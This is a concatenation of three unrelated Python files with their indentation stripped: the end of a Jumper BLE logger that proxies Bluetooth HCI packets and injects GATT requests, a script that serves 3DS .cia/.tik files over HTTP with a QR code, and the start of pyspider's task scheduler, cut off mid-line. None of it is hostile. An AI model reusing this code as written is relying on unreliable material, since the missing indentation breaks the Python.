self._logger.debug('SOCKET: %s', RawCopy(HciPacket).parse(packet))
self.handle_packet(packet, source)
if self._pty_fd in readable:
data = os.read(self._pty_master, 4096)
self._logger.debug('Raw PTY data: %s', repr(data))
self._pty_buffer.write(data)
self._pty_buffer.seek(-len(data), SEEK_CUR)
source = 'pty'
while True:
if self._pty_buffer.pos == self._pty_buffer.len:
break
parsed_packet = RawCopy(HciPacket).parse_stream(self._pty_buffer)
if not parsed_packet:
break
self._logger.debug('PTY: %s', parsed_packet)
packet = parsed_packet.data
self.handle_packet(packet, source)
except KeyboardInterrupt:
log.info("Received SIGTERM, exiting")
def stop(self):
self._should_stop = True
Action = collections.namedtuple(
'Action', 'packets_to_send_to_socket packets_to_send_to_pty data_to_send_to_agent'
)
def get_default_action(packet, source):
if source == 'socket':
return Action(packets_to_send_to_socket=[], packets_to_send_to_pty=[packet], data_to_send_to_agent=None)
elif source == 'pty':
return Action(packets_to_send_to_socket=[packet], packets_to_send_to_pty=[], data_to_send_to_agent=None)
class GattLogger(object):
def __init__(self, logger=None):
self._logger = logger or logging.getLogger(__name__)
self._peripherals_loggers = dict()
self._connection_handle_to_mac_map = dict()
def parse_hci_packet(self, packet):
try:
return RawCopy(HciPacket).parse(packet)
except:
self._logger.error('Exception during packet parsing')
return None
def handle_acl_data_packet(self, parsed_packet_with_raw_data, source):
connection_handle = get_connection_handle_from_acl_data_packet(parsed_packet_with_raw_data.value)
try:
mac_address = self._connection_handle_to_mac_map[connection_handle]
except KeyError:
self._logger.warning(
'Received ACL data packet for an unmapped connection handle: %d. \
This packet will be ignored by the logger', connection_handle
)
else:
try:
peripheral_logger = self._peripherals_loggers[mac_address]
except KeyError:
self._logger.warning(
'Received ACL data packet for a connection handle without a logger: %d. \
This packet will be ignored by the logger', connection_handle
)
else:
return peripheral_logger.handle_message(parsed_packet_with_raw_data, source)
def handle_num_of_completed_packets_event(self, parsed_packet_with_raw_data, source):
parsed_packet = parsed_packet_with_raw_data.value
new_connection_handles = []
new_number_of_completed_packets = []
for i in range(parsed_packet.payload.payload.number_of_handles):
connection_handle = parsed_packet.payload.payload.connection_handles[i]
try:
mac_address = self._connection_handle_to_mac_map[connection_handle]
except KeyError:
pass
else:
if mac_address in self._peripherals_loggers:
number_of_hidden_packets = \
self._peripherals_loggers[mac_address].reset_number_of_hidden_data_packets_to_sockets()
number_of_completed_packets = \
parsed_packet.payload.payload.number_of_completed_packets[i] - number_of_hidden_packets
if number_of_completed_packets != 0:
new_connection_handles.append(connection_handle)
new_number_of_completed_packets.append(number_of_completed_packets)
if len(new_connection_handles) > 0:
new_packet = build_number_of_completed_packets_event_packet(
new_connection_handles, new_number_of_completed_packets
)
return Action(
packets_to_send_to_socket=[],
packets_to_send_to_pty=[new_packet],
data_to_send_to_agent=None
)
def hadle_command_status_event(self, parsed_packet_with_raw_data, source):
block_packet = False
for peripheral_logger in self._peripherals_loggers:
if peripheral_logger.awaiting_response:
block_packet = True
break
if block_packet:
return Action(
packets_to_send_to_socket=[],
packets_to_send_to_pty=[],
data_to_send_to_agent=None
)
def handle_le_connection_complete_event(self, parsed_packet_with_raw_data, source):
parsed_packet = parsed_packet_with_raw_data.value
mac_address, connection_handle = get_meta_data_from_connection_complete_event_packet(parsed_packet)
self._logger.info('Connected to device. MAC: %s Connection handle: %d', mac_address, connection_handle)
self._connection_handle_to_mac_map[connection_handle] = mac_address
if mac_address not in self._peripherals_loggers:
self._peripherals_loggers[mac_address] = \
GattPeripheralLogger(mac_address, self._logger)
self._peripherals_loggers[mac_address].on_connect(connection_handle)
return None
def handle_disconnection_complete_event(self, parsed_packet_with_raw_data, source):
parsed_packet = parsed_packet_with_raw_data.value
connection_handle = get_connection_handle_from_disconnection_complete_event_packet(parsed_packet)
log.info('Disconnection event on handle: {}'.format(connection_handle))
try:
mac_address = self._connection_handle_to_mac_map[connection_handle]
except KeyError:
self._logger.warning(
'Received disconnection event for an unmapped connection handle: %d', connection_handle
)
return None
del self._connection_handle_to_mac_map[connection_handle]
try:
self._peripherals_loggers[mac_address].on_disconnect()
except KeyError:
self._logger.warning(
'Received disconnection event for a connection handle without a logger: %d', connection_handle
)
return None
def handle_message(self, packet, source):
parsed_packet_with_raw_data = self.parse_hci_packet(packet)
action = None
if parsed_packet_with_raw_data is not None:
parsed_packet = parsed_packet_with_raw_data.value
if is_acl_data_packet(parsed_packet):
action = None or self.handle_acl_data_packet(parsed_packet_with_raw_data, source)
elif is_num_of_completed_packets_event(parsed_packet) and source == 'socket':
action = None or self.handle_num_of_completed_packets_event(parsed_packet_with_raw_data, source)
elif is_command_status_packet(parsed_packet):
action = None or self.hadle_command_status_event(parsed_packet_with_raw_data, source)
elif is_le_connection_complete_event(parsed_packet):
action = None or self.handle_le_connection_complete_event(parsed_packet_with_raw_data, source)
elif is_le_disconnection_complete_event(parsed_packet) or is_disconnection_complete_event(parsed_packet):
action = None or self.handle_disconnection_complete_event(parsed_packet_with_raw_data, source)
return action or get_default_action(packet, source)
class GattPeripheralLogger(object):
def __init__(self, mac_address, logger=None):
self._logger = logger or logging.getLogger(__name__)
self._mac_address = mac_address
self._connection_handle = None
self._jumper_data_handle = None
self._jumper_time_handle = None
self.awaiting_response = False
self._queued_pty_packets = []
self._number_of_hidden_data_packets_to_socket = 0
self._state = None
self._boot_time = None
def reset_number_of_hidden_data_packets_to_sockets(self):
result = self._number_of_hidden_data_packets_to_socket
self._number_of_hidden_data_packets_to_socket = 0
return result
def start_time_sync(self, packet):
self._state = 'TIME_SYNC'
self._logger.debug('State = %s', self._state)
self._number_of_hidden_data_packets_to_socket = self._number_of_hidden_data_packets_to_socket + 1
self.awaiting_response = True
self._logger.debug('Sending request for "time from boot"')
return Action(
packets_to_send_to_socket=[gatt_protocol.create_read_request_packet(
self._connection_handle, self._jumper_time_handle
)],
packets_to_send_to_pty=[packet],
data_to_send_to_agent=None
)
def on_connect(self, connection_handle):
self._connection_handle = connection_handle
self._jumper_data_handle = None
self._jumper_time_handle = None
self.awaiting_response = False
self._state = 'INIT'
self._boot_time = None
def on_disconnect(self):
self._state = 'DISCONNECTED'
def handle_message(self, parsed_packet_with_raw_data, source):
parsed_packet = parsed_packet_with_raw_data.value
packet = parsed_packet_with_raw_data.data
if self._state == 'INIT':
if is_read_by_type_response_packet(parsed_packet):
self._logger.debug('read by type response')
self._jumper_data_handle = \
self._jumper_data_handle or \
find_handle_in_read_by_type_response_packet(parsed_packet, JUMPER_DATA_CHARACTERISTIC_UUID)
self._jumper_time_handle = \
self._jumper_time_handle or \
find_handle_in_read_by_type_response_packet(parsed_packet, JUMPER_TIME_CHARACTERISTIC_UUID)
if self._jumper_data_handle and self._jumper_time_handle:
return self.start_time_sync(packet)
elif self._state == 'TIME_SYNC':
if source == 'socket' and is_read_response_packet(parsed_packet):
self._boot_time = \
datetime.utcnow() - timedelta(0, get_value_from_read_response_packet(parsed_packet))
self._state = 'STARTING_NOTIFICATIONS'
self._logger.debug('State = %s', self._state)
self._number_of_hidden_data_packets_to_socket = self._number_of_hidden_data_packets_to_socket + 1
self.awaiting_response = True
return Action(
packets_to_send_to_socket=[gatt_protocol.create_start_notifying_on_handle_packet(
self._connection_handle, self._jumper_data_handle
)],
packets_to_send_to_pty=[],
data_to_send_to_agent=None
)
elif source == 'pty':
self._logger.debug('Queuing PTY packet: %s', parsed_packet)
self._queued_pty_packets.append(packet)
return Action(packets_to_send_to_socket=[], packets_to_send_to_pty=[], data_to_send_to_agent=None)
elif self._state == 'STARTING_NOTIFICATIONS':
if source == 'socket' and is_write_response_packet(parsed_packet):
self._logger.info('Received write response packet')
self._logger.debug('Releasing queued PTY packets')
queued_pty_packets = list(self._queued_pty_packets)
self.awaiting_response = False
self._queued_pty_packets = []
self._state = 'RUNNING'
self._logger.debug('State = %s', self._state)
return Action(
packets_to_send_to_socket=queued_pty_packets, packets_to_send_to_pty=[], data_to_send_to_agent=None
)
elif source == 'pty':
self._logger.debug('Queuing PTY packet: %s', parsed_packet)
self._queued_pty_packets.append(packet)
return Action(packets_to_send_to_socket=[], packets_to_send_to_pty=[], data_to_send_to_agent=None)
elif self._state == 'RUNNING':
if self._is_jumper_notify_message(parsed_packet):
data_to_send_to_agent = DataToSendToAgent(
mac_address=self._mac_address,
payload=get_data_from_notify_message(parsed_packet),
boot_time=self._boot_time
)
self._logger.info('Received data from logger: %s', repr(data_to_send_to_agent))
return Action(
packets_to_send_to_socket=[], packets_to_send_to_pty=[], data_to_send_to_agent=data_to_send_to_agent
)
elif self._state == 'DISCONNECTED':
log.warning('Received packet while disconnected: %s', parsed_packet)
return get_default_action(packet, source)
def _is_jumper_notify_message(self, parsed_packet):
return parsed_packet.type == 'ACL_DATA_PACKET' and \
parsed_packet.payload.payload.cid == ATT_CID and \
parsed_packet.payload.payload.payload.opcode == 'ATT_OP_HANDLE_NOTIFY' and \
parsed_packet.payload.payload.payload.payload.handle == self._jumper_data_handle
def find_handle_in_read_by_type_response_packet(parsed_packet, characteristics_uuid):
for handle_value_pair in parsed_packet.payload.payload.payload.payload.attribute_data_list:
characteristic_declaration = gatt_protocol.parse_characteristic_declaration(handle_value_pair.value)
try:
if characteristic_declaration.uuid == characteristics_uuid:
return characteristic_declaration.value_handle
except ValueError:
pass
return None
def get_data_from_notify_message(parsed_packet):
return parsed_packet.payload.payload.payload.payload.data
def get_value_from_read_response_packet(parsed_packet):
return parsed_packet.payload.payload.payload.payload.value
def is_read_bd_address_command_complete_event_packet(parsed_packet):
return parsed_packet.type == 'EVENT_PACKET' and \
parsed_packet.payload.event == 'COMMAND_COMPLETE' and \
parsed_packet.payload.payload.ogf == 'INFORMATIONAL_PARAMETERS' and \
parsed_packet.payload.payload.ocf == 'READ_BD_ADDRESS_COMMAND'
def is_read_by_type_response_packet(parsed_packet):
return parsed_packet.type == 'ACL_DATA_PACKET' and \
parsed_packet.payload.payload.cid == ATT_CID and \
parsed_packet.payload.payload.payload.opcode == 'ATT_OP_READ_BY_TYPE_RESPONSE'
def is_read_response_packet(parsed_packet):
return parsed_packet.type == 'ACL_DATA_PACKET' and \
parsed_packet.payload.payload.cid == ATT_CID and \
parsed_packet.payload.payload.payload.opcode == 'ATT_OP_READ_RESPONSE'
def is_acl_data_packet(parsed_packet):
return parsed_packet.type == 'ACL_DATA_PACKET'
def get_connection_handle_from_acl_data_packet(parsed_packet):
return parsed_packet.payload.handle
def is_le_connection_complete_event(parsed_packet):
return parsed_packet.type == 'EVENT_PACKET' and \
parsed_packet.payload.event == 'LE_META_EVENT' and \
parsed_packet.payload.payload.subevent == 'LE_CONNECTION_COMPLETED'
def get_meta_data_from_connection_complete_event_packet(parsed_packet):
return parsed_packet.payload.payload.payload.peer_bdaddr, parsed_packet.payload.payload.payload.handle
def is_le_disconnection_complete_event(parsed_packet):
return parsed_packet.type == 'EVENT_PACKET' and \
parsed_packet.payload.event == 'DISCONNECTION_COMPLETED'
def is_disconnection_complete_event(parsed_packet):
return parsed_packet.type == 'EVENT_PACKET' and \
parsed_packet.payload.event == 'DISCONNECTION_COMPLETE'
def get_connection_handle_from_disconnection_complete_event_packet(parsed_packet):
return parsed_packet.payload.payload.handle
def is_write_response_packet(parsed_packet):
return parsed_packet.type == 'ACL_DATA_PACKET' and \
parsed_packet.payload.payload.cid == ATT_CID and \
parsed_packet.payload.payload.payload.opcode == 'ATT_OP_WRITE_RESPONSE'
def is_num_of_completed_packets_event(parsed_packet):
return parsed_packet.type == 'EVENT_PACKET' and parsed_packet.payload.event == 'NUMBER_OF_COMPLETED_PACKETS'
def is_command_status_packet(parsed_packet):
return parsed_packet.type == 'EVENT_PACKET' and parsed_packet.payload == 'COMMAND_STATUS'
def get_list_of_handle_and_num_of_completed_packets_pairs_from_num_of_completed_packets_event(parsed_packet):
result = []
for i in range(parsed_packet.payload.payload.number_of_handles):
result.append(
(
parsed_packet.payload.payload.connection_handles[i],
parsed_packet.payload.payload.number_of_completed_packets[i]
)
)
return result
def build_number_of_completed_packets_event_packet(connection_handles, number_of_completed_packets):
return HciPacket.build(
dict(
type='EVENT_PACKET',
payload=dict(
event='NUMBER_OF_COMPLETED_PACKETS',
payload=dict(
number_of_handles=len(connection_handles),
connection_handles=connection_handles,
number_of_completed_packets=number_of_completed_packets
)
)
)
)
def change_dictionary_keys_from_str_to_int(d):
return {int(k): v for k, v in d.items()}
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'--flush-threshold', help='Number of events buffered until flushing', type=int, default=DEFAULT_FLUSH_THRESHOLD
)
parser.add_argument(
'--flush-priority', help='Event priority (integer) upon which to flush pending events', type=int,
default=DEFAULT_FLUSH_PRIORITY
)
parser.add_argument(
'--flush-interval', help='Interval in seconds after which pending events will be flushed', type=float,
default=DEFAULT_FLUSH_INTERVAL
)
parser.add_argument(
'--default-event-type', help='Default event type if not specified in the event itself', type=str,
default=DEFAULT_EVENT_TYPE
)
parser.add_argument(
'--events-config-file',
type=str,
help='Path of the events config file in JSON format.',
default='/etc/jumper_ble_logger/events_config.json'
)
parser.add_argument(
'--config-file',
type=str,
help='Path of the config file in JSON format.',
default='/etc/jumper_ble_logger/config.json'
)
parser.add_argument('--hci', '-i', type=int, default=0, help='The number of HCI device to connect to')
parser.add_argument('--verbose', '-v', action='count', help='Verbosity, call this flag twice for ultra verbose mode')
parser.add_argument('--log-file', '-l', type=str, default=None, help='Dumps log to file')
parser.add_argument('-d', '--dev-mode', help='Sends data to development BE', action='store_true')
args = parser.parse_args()
if args.verbose == 1:
logging_level = logging.INFO
elif args.verbose > 1:
logging_level = logging.DEBUG
else:
logging_level = logging.WARN
logging.basicConfig(format='%(asctime)s %(levelname)8s %(name)10s: %(message)s', level=logging_level)
logger = logging.getLogger(__file__)
logger.info('Jumper BLE Logger {}'.format(__version__))
if args.log_file is not None:
logger.addHandler(logging.FileHandler(args.log_file, mode='w'))
if not os.path.isfile(args.config_file):
print('Config file is missing: {}'.format(args.config_file))
return 3
with open(args.config_file) as fd:
try:
config = json.load(fd)
except ValueError:
print('Config file must be in JSON format: {}'.format(args.config_file))
return 4
try:
project_id = config['project_id']
write_key = config['write_key']
except KeyError as e:
print('Missing entry in config file: {}. {}'.format(args.config_file, e))
return 5
if not os.path.isfile(args.events_config_file):
print('Config file is missing: {}'.format(args.events_config_file))
return 1
with open(args.events_config_file) as fd:
try:
events_config = change_dictionary_keys_from_str_to_int(json.load(fd))
except ValueError:
print('Config file must be in JSON format: {}'.format(args.events_config_file))
return 2
print('Starting agent')
agent_started_event = threading.Event()
def on_listening():
print('Agent listening on named pipe %s' % (agent.input_filename,))
agent_started_event.set()
agent = Agent(
input_filename=DEFAULT_INPUT_FILENAME,
project_id=project_id,
write_key=write_key,
flush_priority=args.flush_priority,
flush_threshold=args.flush_threshold,
flush_interval=args.flush_interval,
default_event_type=args.default_event_type,
event_store=None,
on_listening=on_listening,
dev_mode=args.dev_mode
)
atexit.register(agent.cleanup)
logging_agent_thread = threading.Thread(target=agent.start)
logging_agent_thread.start()
agent_started_event.wait()
hci_proxy = HciProxy(args.hci, logger, events_config)
try:
hci_proxy.run()
except KeyboardInterrupt:
pass
agent.stop()
logging_agent_thread.join()
agent.cleanup()
print('Exiting')
return 0
if __name__ == '__main__':
x = main()
exit(x)
|
servefiles.py | import atexit
import os
import sys
import tempfile
import threading
import urllib
import netifaces
import qrcode
from PIL import ImageTk
try:
from SimpleHTTPServer import SimpleHTTPRequestHandler
from SocketServer import TCPServer
from Tkinter import Tk, Frame, Label, BitmapImage
from urlparse import urljoin
from urllib import pathname2url, quote
except ImportError:
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from tkinter import Tk, Frame, Label, BitmapImage
from urllib.parse import urljoin, quote
from urllib.request import pathname2url
if len(sys.argv) < 2:
print("Please specify a file/directory.")
sys.exit(1)
directory = sys.argv[1]
if not os.path.exists(directory):
print(directory + ": No such file or directory.")
sys.exit(1)
print("Preparing data...")
baseUrl = netifaces.ifaddresses(netifaces.gateways()['default'][netifaces.AF_INET][1])[2][0]['addr'] + ":8080/"
qrData = ""
if os.path.isfile(directory):
if directory.endswith(('.cia', '.tik')):
qrData += baseUrl + quote(os.path.basename(directory))
directory = os.path.dirname(directory)
else:
for file in [ file for file in next(os.walk(directory))[2] if file.endswith(('.cia', '.tik')) ]:
qrData += baseUrl + quote(file) + "\n"
if len(qrData) == 0:
print("No files to serve.")
sys.exit(1)
if not directory == "":
os.chdir(directory)
print("")
print("URLS:")
print(qrData)
print("")
print("Generating QR code...")
try:
qrImage = qrcode.make(qrData, box_size=5)
except qrcode.exceptions.DataOverflowError:
print("Error: URL list too large for a QR code. Try reducing file name lengths or the number of files to send.")
sys.exit(1)
print("Opening HTTP server on port 8080...")
server = TCPServer(("", 8080), SimpleHTTPRequestHandler)
thread = threading.Thread(target=server.serve_forever)
thread.start()
atexit.register(server.shutdown)
print("Displaying QR code...")
root = Tk()
root.title("QR Code")
frame = Frame(root)
frame.pack()
qrBitmap = ImageTk.PhotoImage(qrImage)
qrLabel = Label(frame, image=qrBitmap)
qrLabel.pack()
root.mainloop()
print("Shutting down HTTP server...")
server.shutdown()
|
scheduler.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-02-07 17:05:11
import itertools
import json
import logging
import os
import time
from collections import deque
from six import iteritems, itervalues
from six.moves import queue as Queue
from pyspider.libs import counter, utils
from pyspider.libs.base_handler import BaseHandler
from .task_queue import TaskQueue
logger = logging.getLogger('scheduler')
class Project(object):
'''
project for scheduler
'''
def __init__(self, scheduler, project_info):
'''
'''
self.scheduler = scheduler
self.active_tasks = deque(maxlen=scheduler.ACTIVE_TASKS)
self.task_queue = TaskQueue()
self.task_loaded = False
self._selected_tasks = False # selected tasks after recent pause
self._send_finished_event_wait = 0 # wait for scheduler.FAIL_PAUSE_NUM loop steps before sending the event
self.md5sum = None
self._send_on_get_info = False
self.waiting_get_info = True
self._paused = False
self._paused_time = 0
self._unpause_last_seen = None
self.update(project_info)
@property
def paused(self):
if self.scheduler.FAIL_PAUSE_NUM <= 0:
return False
# unpaused --(last FAIL_PAUSE_NUM task failed)--> paused --(PAUSE_TIME)--> unpause_checking
# unpaused <--(last UNPAUSE_CHECK_NUM task have success)--|
# paused <--(last UNPAUSE_CHECK_NUM task no success)--|
if not self._paused:
fail_cnt = 0
for _, task in self.active_tasks:
# ignore select task
if task.get('type') == self.scheduler.TASK_PACK:
continue
if 'process' not in task['track']:
logger.error('process not in task, %r', task)
if task['track']['process']['ok']:
break
else:
fail_cnt += 1
if fail_cnt >= self.scheduler.FAIL_PAUSE_NUM:
break
if fail_cnt >= self.scheduler.FAIL_PAUSE_NUM:
self._paused = True
self._paused_time = time.time()
elif self._paused is True and (self._paused_time + self.scheduler.PAUSE_TIME < time.time()):
self._paused = 'checking'
self._unpause_last_seen = self.active_tasks[0][1] if len(self.active_tasks) else None
elif self._paused == 'checking':
cnt = 0
fail_cnt = 0
for _, task in self.active_tasks:
if task is self._unpause_last_seen:
break
# ignore select task
if task.get('type') == self.scheduler.TASK_PACK:
continue
cnt += 1
if task['track']['process']['ok']:
# break with enough check cnt
cnt = max(cnt, self.scheduler.UNPAUSE_CHECK_NUM)
break
else:
fail_cnt += 1
if cnt >= self.scheduler.UNPAUSE_CHECK_NUM:
if fail_cnt == cnt:
self._paused = True
self._paused_time = time.time()
else:
self._paused = False
return self._paused is True
def update(self, project_info):
self.project_info = project_info
self.name = project_info['name']
self.group = project_info['group']
self.db_status = project_info['status']
self.updatetime = project_info['updatetime']
md5sum = utils.md5string(project_info['script'])
if (self.md5sum != md5sum or self.waiting_get_info) and self.active:
self._send_on_get_info = True
self.waiting_get_info = True
self.md5sum = md5sum
if self.active:
self.task_queue.rate = project_info['rate']
self.task_queue.burst = project_info['burst']
else:
self.task_queue.rate = 0
self.task_queue.burst = 0
logger.info('project %s updated, status:%s, paused:%s, %d tasks',
self.name, self.db_status, self.paused, len(self.task_queue))
def on_get_info(self, info):
self.waiting_get_info = False
self.min_tick = info.get('min_tick', 0)
self.retry_delay = info.get('retry_delay', {})
self.crawl_config = info.get('crawl_config', {})
@property
def active(self):
return self.db_status in ('RUNNING', 'DEBUG')
class Scheduler(object):
UPDATE_PROJECT_INTERVAL = 5 * 60
default_schedule = {
'priority': 0,
'retries': 3,
'exetime': 0,
'age': -1,
'itag': None,
}
LOOP_LIMIT = 1000
LOOP_INTERVAL = 0.1
ACTIVE_TASKS = 100
INQUEUE_LIMIT = 0
EXCEPTION_LIMIT = 3
DELETE_TIME = 24 * 60 * 60
DEFAULT_RETRY_DELAY = {
0: 30,
1: 1*60*60,
2: 6*60*60,
3: 12*60*60,
'': 24*60*60
}
FAIL_PAUSE_NUM = 10
PAUSE_TIME = 5*60
UNPAUSE_CHECK_NUM = 3
TASK_PACK = 1
STATUS_PACK = 2 # current not used
REQUEST_PACK = 3 # current not used
def __init__(self, taskdb, projectdb, newtask_queue, status_queue,
out_queue, data_path='./data', resultdb=None):
self.taskdb = taskdb
self.projectdb = projectdb
self.resultdb = resultdb
self.newtask_queue = newtask_queue
self.status_queue = status_queue
self.out_queue = out_queue
self.data_path = data_path
self._send_buffer = deque()
self._quit = False
self._exceptions = 0
self.projects = dict()
self._force_update_project = False
self._last_update_project = 0
self._last_tick = int(time.time())
self._postpone_request = []
self._cnt = {
"5m_time": counter.CounterManager(
lambda: counter.TimebaseAverageEventCounter(30, 10)),
"5m": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(30, 10)),
"1h": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(60, 60)),
"1d": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(10 * 60, 24 * 6)),
"all": counter.CounterManager(
lambda: counter.TotalCounter()),
}
self._cnt['1h'].load(os.path.join(self.data_path, 'scheduler.1h'))
self._cnt['1d'].load(os.path.join(self.data_path, 'scheduler.1d'))
self._cnt['all'].load(os.path.join(self.data_path, 'scheduler.all'))
self._last_dump_cnt = 0
def _update_projects(self):
'''Check project update'''
now = time.time()
if (
not self._force_update_project
and self._last_update_project + self.UPDATE_PROJECT_INTERVAL > now
):
return
for project in self.projectdb.check_update(self._last_update_project):
self._update_project(project)
logger.debug("project: %s updated.", project['name'])
self._force_update_project = False
self._last_update_project = now
get_info_attributes = ['min_tick', 'retry_delay', 'crawl_config']
def _update_project(self, project):
'''update one project'''
if project['name'] not in self.projects:
self.projects[project['name']] = Project(self, project)
else:
self.projects[project['name']].update(project)
project = self.projects[project['name']]
if project._send_on_get_info:
# update project runtime info from processor by sending a _on_get_info
# request, result is in status_page.track.save
project._send_on_get_info = False
self.on_select_task({
'taskid': '_on_get_info',
'project': project.name,
'url': 'data:,_on_get_info',
'status': self.taskdb.SUCCESS,
'fetch': {
'save': self.get_info_attributes,
},
'process': {
'callback': '_on_get_info',
},
})
# load task queue when project is running and delete task_queue when project is stoped
if project.active:
if not project.task_loaded:
self._load_tasks(project)
project.task_loaded = True
else:
if project.task_loaded:
project.task_queue = TaskQueue()
project.task_loaded = False
if project not in self._cnt['all']:
self._update_project_cnt(project.name)
scheduler_task_fields = ['taskid', 'project', 'schedule', ]
def _load_tasks(self, project):
'''load tasks from database'''
task_queue = project.task_queue
for task in self.taskdb.load_tasks(
self.taskdb.ACTIVE, project.name, self.scheduler_task_fields
):
taskid = task['taskid']
_schedule = task.get('schedule', self.default_schedule)
priority = _schedule.get('priority', self.default_schedule['priority'])
exetime = _schedule.get('exetime', self.default_schedule['exetime'])
task_queue.put(taskid, priority, exetime)
project.task_loaded = True
logger.debug('project: %s loaded %d tasks.', project.name, len(task_queue))
if project not in self._cnt['all']:
self._update_project_cnt(project.name)
self._cnt['all'].value((project.name, 'pending'), len(project.task_queue))
def _update_project_cnt(self, project_name):
status_count = self.taskdb.status_count(project_name)
self._cnt['all'].value(
(project_name, 'success'),
status_count.get(self.taskdb.SUCCESS, 0)
)
self._cnt['all'].value(
(project_name, 'failed'),
status_count.get(self.taskdb.FAILED, 0) + status_count.get(self.taskdb.BAD, 0)
)
self._cnt['all'].value(
(project_name, 'pending'),
status_count.get(self.taskdb.ACTIVE, 0)
)
def task_verify(self, task):
'''
return False if any of 'taskid', 'project', 'url' is not in task dict
or project in not in task_queue
'''
for each in ('taskid', 'project', 'url', ):
if each not in task or not task[each]:
logger.error('%s not in task: %.200r', each, task)
return False
if task['project'] not in self.projects:
logger.error('unknown project: %s', task['project'])
return False
project = self.projects[task['project']]
if not project.active:
logger.error('project %s not started, please set status to RUNNING or DEBUG',
task['project'])
return False
return True
def insert_task(self, task):
'''insert task into database'''
return self.taskdb.insert(task['project'], task['taskid'], task)
def update_task(self, task):
'''update task in database'''
return self.taskdb.update(task['project'], task['taskid'], task)
def put_task(self, task):
'''put task to task queue'''
_schedule = task.get('schedule', self.default_schedule)
self.projects[task['project']].task_queue.put(
task['taskid'],
priority=_schedule.get('priority', self.default_schedule['priority']),
exetime=_schedule.get('exetime', self.default_schedule['exetime'])
)
def send_task(self, task, force=True):
'''
dispatch task to fetcher
out queue may have size limit to prevent block, a send_buffer is used
'''
try:
self.out_queue.put_nowait(task)
except Queue.Full:
if force:
self._send_buffer.appendleft(task)
else:
raise
def _check_task_done(self):
'''Check status queue'''
cnt = 0
try:
while True:
task = self.status_queue.get_nowait()
# check _on_get_info result here
if task.get('taskid') == '_on_get_info' and 'project' in task and 'track' in task:
if task['project'] not in self.projects:
continue
project = self.projects[task['project']]
project.on_get_info(task['track'].get('save') or {})
logger.info(
'%s on_get_info %r', task['project'], task['track'].get('save', {})
)
continue
elif not self.task_verify(task):
continue
self.on_task_status(task)
cnt += 1
except Queue.Empty:
pass
return cnt
merge_task_fields = ['taskid', 'project', 'url', 'status', 'schedule', 'lastcrawltime']
def _check_request(self):
'''Check new task queue'''
# check _postpone_request first
todo = []
for task in self._postpone_request:
if task['project'] not in self.projects:
continue
if self.projects[task['project']].task_queue.is_processing(task['taskid']):
todo.append(task)
else:
self.on_request(task)
self._postpone_request = todo
tasks = {}
while len(tasks) < self.LOOP_LIMIT:
try:
task = self.newtask_queue.get_nowait()
except Queue.Empty:
break
if isinstance(task, list):
_tasks = task
else:
_tasks = (task, )
for task in _tasks:
if not self.task_verify(task):
continue
if task['taskid'] in self.projects[task['project']].task_queue:
if not task.get('schedule', {}).get('force_update', False):
logger.debug('ignore newtask %(project)s:%(taskid)s %(url)s', task)
continue
if task['taskid'] in tasks:
if not task.get('schedule', {}).get('force_update', False):
continue
tasks[task['taskid']] = task
for task in itervalues(tasks):
self.on_request(task)
return len(tasks)
def _check_cronjob(self):
"""Check projects cronjob tick, return True when a new tick is sended"""
now = time.time()
self._last_tick = int(self._last_tick)
if now - self._last_tick < 1:
return False
self._last_tick += 1
for project in itervalues(self.projects):
if not project.active:
continue
if project.waiting_get_info:
continue
if int(project.min_tick) == 0:
continue
if self._last_tick % int(project.min_tick) != 0:
continue
self.on_select_task({
'taskid': '_on_cronjob',
'project': project.name,
'url': 'data:,_on_cronjob',
'status': self.taskdb.SUCCESS,
'fetch': {
'save': {
'tick': self._last_tick,
},
},
'process': {
'callback': '_on_cronjob',
},
})
return True
request_task_fields = [
'taskid',
'project',
'url',
'status',
'schedule',
'fetch',
'process',
'track',
'lastcrawltime'
]
def _check_select(self):
'''Select task to fetch & process'''
while self._send_buffer:
_task = self._send_buffer.pop()
try:
# use force=False here to prevent automatic send_buffer append and get exception
self.send_task(_task, False)
except Queue.Full:
self._send_buffer.append(_task)
break
if self.out_queue.full():
return {}
taskids = []
cnt = 0
cnt_dict = dict()
limit = self.LOOP_LIMIT
for project in itervalues(self.projects):
if not project.active:
continue
# only check project pause when select new tasks, cronjob and new request still working
if project.paused:
continue
if project.waiting_get_info:
continue
if cnt >= limit:
break
# task queue
task_queue = project.task_queue
task_queue.check_update()
project_cnt = 0
# check send_buffer here. when not empty, out_queue may blocked. Not sending tasks
while cnt < limit and project_cnt < limit / 10:
taskid = task_queue.get()
if not taskid:
break
taskids.append((project.name, taskid))
if taskid != 'on_finished':
project_cnt += 1
cnt += 1
cnt_dict[project.name] = project_cnt
if project_cnt:
project._selected_tasks = True
project._send_finished_event_wait = 0
# check and send finished event to project
if not project_cnt and len(task_queue) == 0 and project._selected_tasks:
# wait for self.FAIL_PAUSE_NUM steps to make sure all tasks in queue have been processed
if project._send_finished_event_wait < self.FAIL_PAUSE_NUM:
project._send_finished_event_wait += 1
else:
project._selected_tasks = False
project._send_finished_event_wait = 0
self._postpone_request.append({
'project': project.name,
'taskid': 'on_finished',
'url': 'data:,on_finished',
'process': {
'callback': 'on_finished',
},
"schedule": {
"age": 0,
"priority": 9,
"force_update": True,
},
})
for project, taskid in taskids:
self._load_put_task(project, taskid)
return cnt_dict
def _load_put_task(self, project, taskid):
try:
task = self.taskdb.get_task(project, taskid, fields=self.request_task_fields)
except ValueError:
logger.error('bad task pack %s:%s', project, taskid)
return
if not task:
return
task = self.on_select_task(task)
def _print_counter_log(self):
# print top 5 active counters
keywords = ('pending', 'success', 'retry', 'failed')
total_cnt = {}
project_actives = []
project_fails = []
for key in keywords:
total_cnt[key] = 0
for project, subcounter in iteritems(self._cnt['5m']):
actives = 0
for key in keywords:
cnt = subcounter.get(key, None)
if cnt:
cnt = cnt.sum
total_cnt[key] += cnt
actives += cnt
project_actives.append((actives, project))
fails = subcounter.get('failed', None)
if fails:
project_fails.append((fails.sum, project))
top_2_fails = sorted(project_fails, reverse=True)[:2]
top_3_actives = sorted([x for x in project_actives if x[1] not in top_2_fails],
reverse=True)[:5 - len(top_2_fails)]
log_str = ("in 5m: new:%(pending)d,success:%(success)d,"
